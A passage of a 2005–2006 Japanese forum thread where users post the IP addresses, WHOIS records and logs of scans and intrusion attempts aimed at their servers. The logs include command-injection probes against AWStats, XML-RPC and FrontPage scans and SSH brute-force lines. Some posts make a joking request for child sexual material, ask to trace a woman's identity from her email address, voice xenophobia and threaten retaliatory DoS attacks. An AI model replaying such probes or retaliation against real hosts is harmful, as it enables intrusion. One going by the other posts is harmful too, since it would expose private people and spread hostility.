あなたが検索されたアドレス[ 61.204.189.39 ]のJPNICからの応答は以下の通りです。 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 61.204.188.0/22 b. [ネットワーク名] POINT-EA f. [組織名] 株式会社ドリーム・トレイン・インターネット g. [Organization] DREAM TRAIN INTERNET,Inc. m. [管理者連絡窓口] MH4804JP n. [技術連絡担当者] MK10931JP p. [ネームサーバ] ns.dti.ad.jp p. [ネームサーバ] ns2.dti.ad.jp [割当年月日] 2002/11/22 [最終更新] 2005/09/12 14:50:03(JST) 上位情報 ---------- 株式会社パワードコム (POWEREDCOM, Incorporated) [割り振り] 61.204.128.0/17 こんどからさぁ、信頼ゾーンに入れておくからさぁ、 おじさんにロリコン物をわけてくれよぅ。
342 :
名無しさん@お腹いっぱい。 :2005/12/25(日) 09:46:42
送信元はバラバラなんだけど3時間で8333ポートを2000回以上ノックされたw 送信元、一部抜粋 217-159-252-96-dsl.prn.estpak.ee c-24-6-44-87.hsd1.ca.comcast.net S01060040052da136.cg.shawcable.net(68.147.57.68) 203.84.69.5.in-addr.arpa.rivernet.com.au MYCHAT-E8BA33A8(140.113.185.63) 220-129-148-214.dynamic.hinet.net 61-70-221-181.adsl.static.giga.net.tw 24-117-68-77.cpe.cableone.net modemcable071.107-37-24.mc.videotron.ca ip215-128-211-87.adsl2.versatel.nl 218-34-77-245.cm.dynamic.apol.com.tw
83.16.85.11 217.170.24.234 はい2丁追加ー!
不正アクセスだけじゃなくて ネットワークウイルスで攻撃してくるやつが20人くらいいるんだけど・・・ 一応調べたら日本でみんなucom これってどういうことなんですか?
ここんとこ、ブログシステムの脆弱性狙いと思われる何種類かのHTTPアクセスが毎日のようにある。 ダミーホストで落としてるから問題は無いんだけど。
>>337 一応SSHのくライアント認証入れてるからあのスクリプトなら安全という認識です。
正直対応するのきりがない・・・。まぁ国内だけは対応するつもりですけどね。
347 :
名無しさん@お腹いっぱい。 :2005/12/25(日) 15:50:25
あなたが検索されたアドレス[ 61.210.109.25 ]のJPNICからの応答は以下の通りです。 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 61.210.0.0/16 b. [ネットワーク名] INFOWEB f. [組織名] InfoWeb(富士通株式会社) g. [Organization] InfoWeb(Fujitsu Ltd.) m. [管理者連絡窓口] KH071JP n. [技術連絡担当者] KN6902JP n. [技術連絡担当者] TK13654JP p. [ネームサーバ] ns1.hyper.web.ad.jp p. [ネームサーバ] ns3.hyper.web.ad.jp [割当年月日] 2001/05/24 [最終更新] 2003/11/06 11:10:23(JST) 上位情報 ---------- 富士通株式会社 (FUJITSU LIMITED) [割り振り] 61.210.0.0/16 ぼくちんはトロイに感染してないからアタックしても無駄なんだな
24.222.219.188 212.238.220.136 212.41.243.217 218.249.36.88 多いなー 何が楽しいんだろ
210.254.84.178 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 210.254.84.0/22 b. [ネットワーク名] SPN-HIKARI f. [組織名] 東京電力株式会社 g. [Organization] The Tokyo Electric Power Company,Incorporated m. [管理者連絡窓口] KI6575JP n. [技術連絡担当者] KI6575JP p. [ネームサーバ] ns.speednet.ne.jp p. [ネームサーバ] ns2.point.ne.jp [割当年月日] 2003/05/28 [最終更新] 2004/12/15 14:11:08(JST) 上位情報 ---------- 株式会社パワードコム (POWEREDCOM, Incorporated) [割り振り] 210.254.64.0/18 下位情報 マジuzeeeeee!
踏み台にされているのか? 210.191.208.201 - - [24/Dec/2005:00:32:11 +0900] "GET /awstats/awstats.pl?configdir=|echo; (略) 210.191.208.201 - - [24/Dec/2005:00:32:12 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo; (略) 210.191.208.201 - - [24/Dec/2005:00:32:13 +0900] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo; (略) 210.191.208.201 - - [24/Dec/2005:00:32:15 +0900] "POST /xmlrpc.php HTTP/1.1" 404 279 "-" (略) 210.191.208.201 - - [24/Dec/2005:00:32:16 +0900] "POST /blog/xmlrpc.php HTTP/1.1" 404 284 "-" (略) 210.191.208.201 - - [24/Dec/2005:00:32:17 +0900] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 291 "-" (略) 210.191.208.201 - - [24/Dec/2005:00:32:18 +0900] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 292 "-" (略) 210.191.208.201 - - [24/Dec/2005:00:32:20 +0900] "POST /drupal/xmlrpc.php HTTP/1.1" 404 286 "-" (略) 210.191.208.201 - - [24/Dec/2005:00:32:21 +0900] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 292 "-" (略) 210.191.208.201 - - [24/Dec/2005:00:32:22 +0900] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 289 "-" (略) 210.191.208.201 - - [24/Dec/2005:00:32:23 +0900] "POST /xmlrpc.php HTTP/1.1" 404 279 "-" (略) 210.191.208.201 - - [24/Dec/2005:00:32:24 +0900] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 286 "-" (略) 210.191.208.201 - - [24/Dec/2005:00:32:25 +0900] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 286 "-" (略) Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 210.191.208.192/27 b. [ネットワーク名] HAKODATE-C01 f. [組織名] 野又学園函館大学 g. [Organization] Hakodate University
351 :
名無しさん@お腹いっぱい。 :2005/12/26(月) 17:02:49
あなたが検索されたアドレス[ 222.10.249.227 ]のJPNICからの応答は以下の通りです。 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 222.10.249.0/24 b. [ネットワーク名] KDDI-NET f. [組織名] DION (KDDI株式会社) g. [Organization] DION (KDDI CORPORATION) m. [管理者連絡窓口] JP00000127 n. [技術連絡担当者] JP00000181 p. [ネームサーバ] dns0.dion.ne.jp p. [ネームサーバ] dns10.dion.ne.jp p. [ネームサーバ] dns2.dion.ne.jp p. [ネームサーバ] ns1.neweb.ne.jp [割当年月日] 2004/04/28 [最終更新] 2005/07/27 13:53:51(JST) 上位情報 ---------- KDDI株式会社 (KDDI CORPORATION) [割り振り] 222.10.0.0/15 トロイ探索屋さん、おつとめご苦労様です
352 :
名無しさん@お腹いっぱい。 :2005/12/26(月) 23:47:36
219.129.25.220:3826 inetnum: 219.129.25.208 - 219.129.25.223 netname: ZHANJIANG-ZHUYOUBIN-LTD country: CN 中国のスーパーハカー?
353 :
名無しさん@お腹いっぱい。 :2005/12/27(火) 01:22:53
83.233.7.102 ウザー
>>271 219.146.161.10
はうちにも来たよ…
いいかげんにしてくれって感じだ。
355 :
名無しさん@お腹いっぱい。 :2005/12/27(火) 13:22:03
ルータに毎日のように不正アクセスログが表示されるのですが 進入されたのでしょうか? それとも進入しようとして失敗してるのでしょうか? 何処を見ればわかるのでしょう
212.208.64.208 うぜー
>>355 設定も示さず、ログも示さずじゃ、わかりっこない。
358 :
名無しさん@お腹いっぱい。 :2005/12/27(火) 18:53:52
221.245.27.50
inetnum: 221.245.27.48 - 221.245.27.55
netname: USKG0001D110
descr: KETOS
country: JP
admin-c: AT047JP
tech-c: AT047JP
remarks: This information has been partially mirrored by APNIC from
remarks: JPNIC. To obtain more specific information, please use the
remarks: JPNIC WHOIS Gateway at
remarks:
http://www.nic.ad.jp/en/db/whois/en-gateway.html or
remarks: whois.nic.ad.jp for WHOIS client. (The WHOIS client
remarks: defaults to Japanese output, use the /e switch for English
remarks: output)
changed:
[email protected] 20040728
source: JPNIC
うぜ〜!
359 :
名無しさん@お腹いっぱい。 :2005/12/27(火) 19:36:59
あなたが検索されたアドレス[ 222.8.221.181 ]のJPNICからの応答は以下の通りです。 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 222.8.221.0/24 b. [ネットワーク名] KDDI-NET f. [組織名] DION (KDDI株式会社) g. [Organization] DION (KDDI CORPORATION) m. [管理者連絡窓口] JP00000127 n. [技術連絡担当者] JP00000181 p. [ネームサーバ] dns0.dion.ne.jp p. [ネームサーバ] dns10.dion.ne.jp p. [ネームサーバ] dns2.dion.ne.jp p. [ネームサーバ] ns1.neweb.ne.jp [割当年月日] 2004/03/25 [最終更新] 2005/07/27 13:53:51(JST) 上位情報 ---------- KDDI株式会社 (KDDI CORPORATION) [割り振り] 222.8.0.0/16 ねえぼくちゃん、しつこいと逮捕しちゃうぞ♪
[18:03:37] <84.21.209.193> (149,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] POST /_vti_bin/_vti_aut/fp30reg.dll [18:03:40] <84.21.209.193> (0,0) [異常なヘッダーを受信しました] - - [18:13:21] <84.21.209.193> (149,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] POST /_vti_bin/_vti_aut/fp30reg.dll [18:13:24] <84.21.209.193> (0,0) [異常なヘッダーを受信しました] - - [18:35:17] <84.21.209.193> (149,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] POST /_vti_bin/_vti_aut/fp30reg.dll [18:37:39] <84.21.209.193> (0,0) [異常なヘッダーを受信しました] - - [18:46:34] <84.21.209.193> (149,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] POST /_vti_bin/_vti_aut/fp30reg.dll [18:47:03] <84.21.209.193> (0,0) [異常なヘッダーを受信しました] - - [18:50:47] <84.21.209.193> (149,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] POST /_vti_bin/_vti_aut/fp30reg.dll [18:51:10] <84.21.209.193> (0,0) [異常なヘッダーを受信しました] - - [18:53:15] <84.21.209.193> (149,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] POST /_vti_bin/_vti_aut/fp30reg.dll [19:22:08] <84.21.209.193> (149,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] POST /_vti_bin/_vti_aut/fp30reg.dll [19:24:51] <84.21.209.193> (0,0) [異常なヘッダーを受信しました] - - めずらしいお客さん
361 :
名無しさん@お腹いっぱい。 :2005/12/28(水) 03:33:52
一連の、xmlrpc.php へpostログですが、実際にphpファイル置いて ウインドウオープンさせるスクリプトなど置いた場合、こっちも悪いやつ になっちゃいますか? それともpostだから動かない?
理屈は知っているからファイアーウォールに全部お任せで、 外部パケットは全部遮断。 ログなんてもう見てもしゃあないから取っていない。 静か 静か だけどDOS攻撃されたら100倍にして返してやるから覚悟しろよ。
>>361 おいおい、あれを人がブラウザからポチポチやっていると思ってんのか?
シナ方面のバカからしか来ないから全部無視しとけ
みなさんもシナから受けてるんですね。自分もでしたのでなんかホッとします。ハイ。
366 :
名無しさん@お腹いっぱい。 :2005/12/28(水) 12:51:40
グローバルなIPアドレスってなんだかなぁ〜って気がします。 どうして国別に分かる番号を埋めなかったのでしょうか。 閉めるにしても、たくさん有り過ぎる!
>>366 サーバー立ててなきゃ通す必要性がないだろう
それとも、なんかのサービスに外部からアクセスする必要があるのか?
外国を閉めるんじゃなくて、日本だけ開けとけばよござんす。 JPNIC管轄と、APNIC管轄でJPNIC管理のもの、合計で344行以下で範囲指定できるはず。
本当にゲーム程度の事なら全部開けときゃいいじゃんって気もする ゲームのセキュリティーホールがそんなに心配か? もし突かれたらシステム全体が危険になるほどそのゲームは重要な位置にあるのか? このケースがどうなのかは知らんが、目的と手段が入れ替わってるような奴をたまに見かける
実際にネットゲームはヤバイよ そのポートでリモートコントロール出来るように作られていれば、 理論上は何をするのでも可能 キーロガーをインストールするのも情報ファイルを盗むのでも 要は他のトロイと一緒できっかけは1つで十分 ポートが開けばそれを使ってリモート操作すればいいだけ 普通は開いていたとしてもファイアーウォールが遮断してくれるんだけどね
鯖立てると必ずゲームポート突付いてくるんだよなあ
>リモートコントロール たかだかネットゲームにどの程度の権限がある事やら バグ持ちのftpやhttpより危険なネトゲの具体例があったっけ? 危険があったとしても、少なくともリモートコントロールよりは別種のバグの方が怖そうだ
というか
>>366 は一言もゲームだなんて言ってないだろ
ネットゲームだなんて妄想に乗る方がおかしいw
あらゆるIPからポート7743を突かれる winnyやってないのに
376 :
名無しさん@お腹いっぱい。 :2005/12/29(木) 02:00:34
366des Webとメールサーバ立ててます。 日本だけじゃダメで外国とのメールのやりとりもあるので無理。 チャイナと半島さえクリアすれば99%!という話も聞きますので。 あのあたりは物理的に隔離した方がいいんでないのか!と国連決議希望。
こんな時間に大阪キタか。 ふみんかな?
>あのあたりは物理的に隔離した方がいいんでないのか これには激しく同意
2名様ご案内♪ 220.87.24.82(KR) 200.14.96.57(CL) [02:33:55] <220.87.24.82> (213,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /cgi-bin/awstats/awstats.pl [02:33:55] <220.87.24.82> (205,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /cgi-bin/awstats.pl [02:33:56] <220.87.24.82> (201,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /cgi/awstats.pl [02:33:56] <220.87.24.82> (205,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /awstats/awstats.pl [02:33:56] <220.87.24.82> (211,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /cgi-bin/stats/awstats.pl [02:33:57] <220.87.24.82> (203,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /stats/awstats.pl [02:33:57] <220.87.24.82> (197,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /awstats.pl [02:33:58] <220.87.24.82> (207,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /cgi/stats/awstats.pl [03:04:33] <200.14.96.57> (0,0) [ヘッダー受信中に切断しました] - - [03:04:34] <200.14.96.57> (0,0) [ヘッダー受信中に切断しました] - - [03:04:35] <200.14.96.57> (0,0) [ヘッダー受信中に切断しました] - - [03:04:37] <200.14.96.57> (0,0) [ヘッダー受信中に切断しました] - - [03:04:38] <200.14.96.57> (0,0) [ヘッダー受信中に切断しました] - - [03:04:40] <200.14.96.57> (0,0) [ヘッダー受信中に切断しました] - -
380 :
名無しさん@お腹いっぱい。 :2005/12/31(土) 17:10:00
あなたが検索されたアドレス[ 222.228.18.35 ]のJPNICからの応答は以下の通りです。 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 222.228.18.0/24 b. [ネットワーク名] V-FLETS f. [組織名] グローバルソリューション株式会社 g. [Organization] Global Solution K.K. m. [管理者連絡窓口] IH010JP n. [技術連絡担当者] MA2355JP p. [ネームサーバ] ns1.vectant.ne.jp p. [ネームサーバ] ns2.vectant.ne.jp [割当年月日] 2004/05/25 [最終更新] 2004/05/25 11:42:03(JST) 上位情報 ---------- グローバルソリューション株式会社 (Global Solution K.K.) [割り振り] 222.228.0.0/16 おたくさんのユーザーさんにはやんちゃものがいるようですね?
381 :
名無しさん@お腹いっぱい。 :2006/01/01(日) 07:36:41
sshを5秒に一回ペースでノックされていかれました。 221.135.33.92 ・・・インド?鯖立て初心者の私は恐怖でガクブルです。
195.39.35.48氏ね
383 :
名無しさん@お腹いっぱい。 :2006/01/01(日) 11:05:10
おまいらに頼みが;; 旦那が女つくって出ていった… 女の携帯アドレスから電話番号や名前を特定することって可能ですか? お願いします
384 :
名無しさん@お腹いっぱい。 :2006/01/01(日) 11:19:33
210.81.153.192ってドコよ?
386 :
名無しさん@お腹いっぱい。 :2006/01/01(日) 11:23:30
>>381 まず、/etc/hosts.{allow,deny}で閉めとく。Windowsなら分からん。
それから、
IP:202.146.24.166 兵庫県明石市より、先ほど5分間にわたるNewTear攻撃が。 回数はおよそ30。 inetnum: 202.248.24.160 - 202.248.24.191 natname: JMD-NET descr: JAPAN MUSIC DATA CO LTD.
SMURF攻撃 IPアドレス 207.38.8.28 ホスト名 aphexmaster2.gamespy.com IPアドレス割当国 ※ アメリカ合衆国 (US) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
IPアドレス 211.186.233.203
ホスト名 登録なし
[Querying whois.nic.or.kr]
[whois.nic.or.kr]
IPアドレス 211.133.63.152
ホスト名 ntgifu055152.gifu.nt.ftth.ppp.infoweb.ne.jp
ところで、
>>389 みたいな情報ってどこでわかるの?
391 :
名無しさん@お腹いっぱい。 :2006/01/02(月) 22:49:11
softbank219184048022.bbtec.net
219.122.18.191 (c018-191.intsurf.ne.jp) /p2/read.php漁り乙w
393 :
名無しさん@お腹いっぱい。 :2006/01/03(火) 11:34:10
[07:06:28] <210.206.137.4> (208,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /cacti/graph_image.php うちじゃ叩いても何も出ないよー
394 :
名無しさん@お腹いっぱい。 :2006/01/03(火) 21:54:07
222.15.110.69 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 222.15.110.0/24 b. [ネットワーク名] KDDI-NET f. [組織名] DION (KDDI株式会社) g. [Organization] DION (KDDI CORPORATION) m. [管理者連絡窓口] JP00000127 n. [技術連絡担当者] JP00000181 p. [ネームサーバ] dns0.dion.ne.jp p. [ネームサーバ] dns10.dion.ne.jp p. [ネームサーバ] dns2.dion.ne.jp p. [ネームサーバ] ns1.neweb.ne.jp [割当年月日] 2004/09/30 [最終更新] 2005/07/27 13:53:51(JST) 上位情報 ---------- KDDI株式会社 (KDDI CORPORATION) [割り振り] 222.12.0.0/14 ぼかー、トロイには感染しておりませぬ。
395 :
名無しさん@お腹いっぱい。 :2006/01/03(火) 22:17:30
226.223.148.200 初めて侵入検知した ノートン入れているんだけど セキュリティ無効にしないとなぜかこの板にアクセスできない。 有効にすると「ページを表示できません」とでる
396 :
名無しさん@お腹いっぱい。 :2006/01/03(火) 22:51:44
>>395 【インターネットセキュリティ入れたら2ちゃんに書き込めない場合】
1.インターネットセキュリティ起動。
2.真ん中あたりの「プライバシー制御」をクリック。
3.右下あたりの「拡張」クリック。
4.左下の「サイトを追加」をクリック。
5.WWW.を消して「2ch.net」と文字を入れる。
6.左上デフォルトのすぐ下に「2ch.net」と表示されるのでそれをクリック。
→青い反転文字になる。
7.右半分の真ん中あたり「表示したサイトについての情報」欄,
「デフォルト設定を使う」のチェックをはずす。
8.「許可」をクリック。
9.あとはO.K O.K.
397 :
名無しさん@お腹いっぱい。 :2006/01/03(火) 23:37:06
inetnum: 218.222.104.0 - 218.222.127.255 netname: KDDI-NET descr: DION (KDDI CORPORATION) country: JP admin-c: JP00000127 tech-c: JP00000181
398 :
名無しさん@お腹いっぱい。 :2006/01/03(火) 23:41:45
61.121.100.29 TCP SYN FLOOD攻撃を 2006/01/03 00:04:05 - 2006/01/03 22:18:26 に25回 ポートスキャンを 2006/01/03 22:14:02 - 2006/01/03 22:18:58 に12回も行っている。 何者なんだろ・・・ Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 61.121.100.0/24 b. [ネットワーク名] NIFTY-SERVE f. [組織名] ニフティサーブ ネットワーク(ニフティ株式会社) g. [Organization] NIFTY SERVE NETWORK(NIFTY Corporation) m. [管理者連絡窓口] YN006JP n. [技術連絡担当者] KS1046JP n. [技術連絡担当者] YN917JP p. [ネームサーバ] ns0.nifty.ad.jp p. [ネームサーバ] ns1.nifty.ad.jp [割当年月日] 2001/07/16 [最終更新] 2001/07/16 22:32:02(JST) 上位情報 ---------- 富士通株式会社 (FUJITSU LIMITED) [割り振り] 61.121.0.0/17 下位情報 ---------- 該当するデータがありません。
399 :
395 :2006/01/04(水) 00:41:19
>>396 試したけどだめだった。
だけど
>>395 の不正アクセスしてきたIP制限解除したら
アクセスできなかった板にアクセスできるようになった。
とにかくありがとう。
401 :
395 :2006/01/04(水) 22:08:15
>>400 一番下のURLにアクセスしたら侵入検知が作動したんだけど。
206.223.150.175
これってどういうこと?
パソコン詳しくないから全くわからん。
2chのプロキシー確認じゃないの?
しつこいぞ TCP SYN FLOOD攻撃 IPアドレス 218.64.186.131 ホスト名 対応するホスト名がありません IPアドレス割当国 ※ 中国 (CN) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし 何度やっても無駄だから
404 :
名無しさん@お腹いっぱい。 :2006/01/05(木) 00:03:56
mm-***-***-***-**.dialup.mgts.by mm-***-***-***-**.adsl.mgts.by 年末年始に、 掲示板&ブログにスクリプトで書き込みしやがる。
>>401 そこはメールアドレスに特定の文字列をいれるとノートン先生が反応するってスレ
で、その特定の文字列を、そのスレに書いたやつがいるから侵入検知が作動している。
406 :
401 :2006/01/05(木) 12:53:34
IPアドレス 193.65.41.35 ホスト名 proxy2.lasipalatsi.fi IPアドレス 割当国 ※ フィンランド (FI) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし まじウザい。そんな頻繁にやるな。
64.237.38.118からSYN FLOOD、ポートスキャン頂いてます。 今日の21時から今までで SYN FLOOD・・・948回 ポートスキャン3995回 キモスwwIP変えよ。
125.192.65.120 FLH1Aba120.iba.mesh.ad.jp
410 :
名無しさん@お腹いっぱい。 :2006/01/07(土) 19:58:22
hosts.deny ALL:中国
70.37.42.73 Non-authoritative answer: 73.42.37.70.in-addr.arpa name = temecula-cuda1-70-37-42-73.ontrca.adelphia.net. Authoritative answers can be found from: 42.37.70.in-addr.arpa nameserver = ns1.adelphia.net. 42.37.70.in-addr.arpa nameserver = ns2.adelphia.net. 42.37.70.in-addr.arpa nameserver = ns3.adelphia.net. ns1.adelphia.net internet address = 24.50.78.2 ns2.adelphia.net internet address = 68.168.224.177 ns3.adelphia.net internet address = 68.168.192.17
61.44.82.20 Non-authoritative answer: 20.82.44.61.in-addr.arpa name = 20.82.44.61.ap.seikyou.ne.jp. Authoritative answers can be found from: 82.44.61.in-addr.arpa nameserver = NS1.FreeBit.NET. 82.44.61.in-addr.arpa nameserver = NS2.FreeBit.NET. NS1.FreeBit.NET internet address = 210.143.144.11 NS2.FreeBit.NET internet address = 210.143.144.12
61.152.199.195:80
414 :
名無しさん@お腹いっぱい。 :2006/01/08(日) 12:40:11
TCP SYN FLOOD攻撃 12.158.80.10 221.79.152.41 2006/01/08 12:02:55 - 2006/01/08 12:05:30 9 219.103.130.29 221.79.152.41 2006/01/08 11:09:51 - 2006/01/08 11:18:23 14 219.103.130.30 221.79.152.41 2006/01/08 11:09:51 - 2006/01/08 11:18:23 14 210.136.158.72 221.79.152.41 2006/01/08 10:20:48 - 2006/01/08 11:13:33 184 219.188.199.165 221.79.152.41 2006/01/08 03:39:49 - 2006/01/08 03:42:07 9 211.13.211.3 221.79.152.41 2006/01/08 03:35:56 - 2006/01/08 03:37:57 6
416 :
名無しさん@お腹いっぱい。 :2006/01/08(日) 19:44:52
206.223.152.55 206.223.152.30 USから攻撃されてる。
220.134.13.167(TW) 218.104.211.118(CN) .csv形式の国別IPリストがあればいいんだけどねぇ
219.108.40.29 今日はコレが一番多かった
荒らしがアドレスを抜かれた。
でも懲りずにメチャクチャに荒らしを続けている。
なんとかできないものでしょうか。
459 2006/01/01 02:51:46 ID:2EoNwRdV メイド達の大和 fi-202231173-49.urban.ne.jp
【ご主人様と】メイドさんでエロパロ【呼ばれたい】
http://sakura03.bbspink.com/test/read.cgi/eroparo/1116429800/ 402,403,406-409,411,413,420,421,423,424-426,428,433-438,440,442,443,445,
454,459-462,464,470-475,477,485-490,492,502,517,525,533,539-540,555,559-565,
568-569,582-584,588,590-592,595-596
該当スレ
男が女に犯されるやつ
メイドさんでエロパロ
女性上位で優しく愛撫される小説ver4
兄弟を虐待する姉妹のSS 二日目
苺ましまろエロパロスレッド 苺2こ
ネット上の駄目なエロSS 第五章
少女が年上の男を弄ぶ作品PART4
シンジが女性キャラに虐められるSSスレ
女の子にいじめられる
エロパロ板自治スレッド7
420 :
名無しさん@お腹いっぱい。 :2006/01/09(月) 11:23:19
誰か教えてください。 ログをとってたら まったく身に覚えの無いアクセスがあります。 (うちのHPアドレスは家族しか知らないので) hinet-ip.hinet.net 台湾 ドメインがHINETで国籍が台湾みたいです。 これって、どういう方が どういう意図で どうやってアドレスを知って みているのでしょうか? 初心者の私に教えてください。
421 :
名無しさん@お腹いっぱい。 :2006/01/09(月) 14:34:52
せんせえーー 220.148.7.213 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 220.148.0.0/18 b. [ネットワーク名] TOKAI-NET f. [組織名] 株式会社ザ・トーカイ g. [Organization] TOKAI CO.Ltd. m. [管理者連絡窓口] MT7711JP n. [技術連絡担当者] KK11421JP n. [技術連絡担当者] MI5375JP p. [ネームサーバ] dns0.tokai.or.jp p. [ネームサーバ] dns1.tokai.or.jp p. [ネームサーバ] dns2.tokai.or.jp [割当年月日] 2003/11/18 [最終更新] 2003/11/18 09:42:08(JST) 上位情報 ---------- 株式会社ザ・トーカイ (TOKAI CO.Ltd.) [割り振り] 220.148.0.0/16 この人がトロイを探し回って個人情報を盗もうとしています!! つかまえてください!!
61.172.250.36
IPアドレス 61.126.193.61 から攻撃されたんだけど、どうにかなるんですか? 初めてで判らないから教えて下さい!!
424 :
名無しさん@お腹いっぱい。 :2006/01/09(月) 18:19:18
これはもう、ダメかもしれんね。
203.168.117.197
Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 211.10.16.0/25 b. [ネットワーク名] CLARA f. [組織名] 株式会社クララオンライン g. [Organization] Clara Online, Inc. m. [管理者連絡窓口] KI1054JP n. [技術連絡担当者] KI1054JP p. [ネームサーバ] [割当年月日] 2000/08/18 [返却年月日] [最終更新] 2000/08/18 19:54:04(JST) 上位情報 ---------- ケーブル・アンド・ワイヤレス・アイディーシー株式会社 (Cable & Wireless IDC Inc.) [割り振り] 211.10.16.0/20 ケーブル・アンド・ワイヤレス・アイディーシー株式会社 (Cable & Wireless IDC Inc.) SUBA-113-016 [SUBA] 211.10.16.0/24
Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 218.231.163.0/24 b. [ネットワーク名] EACCESS f. [組織名] イー・アクセス株式会社 g. [Organization] eAccess Co.,Ltd. m. [管理者連絡窓口] YO1846JP n. [技術連絡担当者] HO1626JP p. [ネームサーバ] ns1.eaccess.ne.jp p. [ネームサーバ] ns2.eaccess.ne.jp [割当年月日] 2002/07/11 [返却年月日] [最終更新] 2004/04/15 10:07:37(JST) 上位情報 ---------- イー・アクセス株式会社 (eAccess Ltd.) [割り振り] 218.231.128.0/17
OrgName: Microsoft Corp OrgID: MSFT Address: One Microsoft Way City: Redmond StateProv: WA PostalCode: 98052 Country: US NetRange: 207.46.0.0 - 207.46.255.255 CIDR: 207.46.0.0/16 NetName: MICROSOFT-GLOBAL-NET NetHandle: NET-207-46-0-0-1 Parent: NET-207-0-0-0-0 NetType: Direct Assignment NameServer: NS1.MSFT.NET NameServer: NS5.MSFT.NET NameServer: NS2.MSFT.NET NameServer: NS3.MSFT.NET NameServer: NS4.MSFT.NET Comment: RegDate: 1997-03-31 Updated: 2004-12-09
Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 202.224.152.0/21 b. [ネットワーク名] PANANETIP f. [組織名] パナソニック ネットワークサービシズ株式会社 g. [Organization] Panasonic Network Services Inc. m. [管理者連絡窓口] HK10267JP n. [技術連絡担当者] HO205JP p. [ネームサーバ] dns0.pana.net p. [ネームサーバ] dns1.pana.net [割当年月日] 1999/03/03 [返却年月日] [最終更新] 2004/05/07 10:16:25(JST) 上位情報 ---------- パナソニック ネットワークサービシズ株式会社 (Panasonic Network Services Inc.) [割り振り] 202.224.128.0/18
126.64.94.129 softbank126064094129.bbtec.net 60.68.23.12 softbank060068023012.bbtec.net
431 :
名無しさん@お腹いっぱい。 :2006/01/10(火) 22:05:21
ライブチャットの動画画面をデスクトップ録画するってことは違法なんですかね? それと、そういうのしてるとバレます??
432 :
名無しさん@お腹いっぱい。 :2006/01/10(火) 22:21:49
ライブチャットの動画画面をデスクトップ録画するってことは違法なんですかね? それと、そういうのしてるとバレます??
1、行為自体は合法、それをネットなどで公開すれば違法でFA 2、ばれません 2度カキコすな
434 :
名無しさん@お腹いっぱい。 :2006/01/11(水) 01:41:10
1、行為自体は合法、それをネットなどで公開すれば違法でFA 2、ばれません 2度カキコすな
63.247.81.* 80.239.107.* 150.156.16.*
436 :
名無しさん@お腹いっぱい。 :2006/01/12(木) 12:39:40
kaniwww.city.kani.gifu.jp(210.172.197.20)
SMURF攻撃 IPアドレス 207.38.8.27 ホスト名 aphexmaster1.gamespy.com IPアドレス割当国 ※ アメリカ合衆国 (US) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
IP SPOOFING攻撃 from 192.168.83.47
Jan 13 14:18:28 *** sshd[**]: Did not receive identification string from 219.163.129.92 Jan 13 14:24:07 *** sshd[**]: Illegal user library from 219.163.129.92 Jan 13 14:24:08 *** sshd[**]: Illegal user cyrus from 219.163.129.92 inetnum: 219.163.129.88 - 219.163.129.95 netname: NETXJAPNKK descr: NetXposure Japan K.K.
442 :
名無しさん@お腹いっぱい。 :2006/01/13(金) 22:36:47
NMap Xmas Scan攻撃って何すか?
Did not receive identification string from 222.228.90.132 inetnum: 222.228.90.0 - 222.228.90.255 netname: V-FLETS descr: グローバルソリューション株式会社 country: JP 乙
201.128.9.* 193.23.115.* やれやれだな
Jan 15 18:26:05 *** sshd[8924]: Did not receive identification string from 131.112.80.22 Jan 15 18:28:52 *** sshd[8933]: input_userauth_request: illegal user mata Jan 15 18:28:52 *** sshd[8933]: Failed password for illegal user mata from 131.112.80.22 port 59283 ssh2 Jan 15 18:28:52 *** sshd[8933]: Received disconnect from 131.112.80.22: 11: Bye Bye (略) Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 131.112.0.0/16 b. [ネットワーク名] TITANET f. [組織名] 東京工業大学 g. [Organization] Tokyo Institute of Technology 東工大もやるなぁw
221.188.128.46 p3046-ipad04fukui.fukui.ocn.ne.jp 202.70.215.85 flets-202-70-215-85.client.pikara.ne.jp
447 :
名無しさん@お腹いっぱい。 :2006/01/16(月) 02:05:32
210.141.112.163
448 :
名無しさん@お腹いっぱい。 :2006/01/16(月) 07:48:30
136.187.88.68 honiden-proj.ex.nii.ac.jp f. [組織名] 国立情報学研究所 g. [Organization] National Institute of Informatics やばい、国の機関に目つけられたw
449 :
